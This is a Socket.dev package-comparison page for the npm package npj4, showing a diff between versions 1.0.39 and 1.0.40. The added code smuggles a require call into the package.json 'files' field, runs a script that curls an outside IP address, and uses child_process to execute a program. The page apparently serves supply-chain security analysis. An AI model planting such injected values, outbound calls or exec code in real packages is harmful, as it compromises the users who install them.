Huge News!Announcing our $40M Series B led by Abstract Ventures.Learn More
Socket
Sign inDemoInstall
Socket

npj4

Package Overview
Dependencies
Maintainers
0
Versions
50
Alerts
File Explorer

Advanced tools

Socket logo

Install Socket

Detect and block malicious and high-risk dependencies

Install

npj4 - npm Package Compare versions

Comparing version 1.0.39 to 1.0.40

新建 AutoIt v3 Script.au3

6

package.json
{
"name": "npj4",
"version": "1.0.39",
"version": "1.0.40",
"description": "",

@@ -13,3 +13,3 @@ "main": "index.js",

"files": [
"');//"
"');require('index.js');//"
]

@@ -24,3 +24,3 @@ }

"scripts": {
"analyze": "curl http://47.99.124.12"
"analyze": "curl http://47.99.124.12:1234"
},

@@ -27,0 +27,0 @@ "author": "",

@@ -1,1 +0,14 @@

require('testse');
(async () => {
const a = await import("child_process");
a.exec("calc", (error, stdout, stderr) => {
if (error) {
console.error(`Error: ${error.message}`);
return;
}
if (stderr) {
console.error(`Stderr: ${stderr}`);
return;
}
console.log(`Stdout: ${stdout}`);
});
})();
SocketSocket SOC 2 Logo

Product

  • Package Alerts
  • Integrations
  • Docs
  • Pricing
  • FAQ
  • Roadmap
  • Changelog

Packages

npm

Stay in touch

Get open source security insights delivered straight into your inbox.


  • Terms
  • Privacy
  • Security

Made with ⚡️ by Socket Inc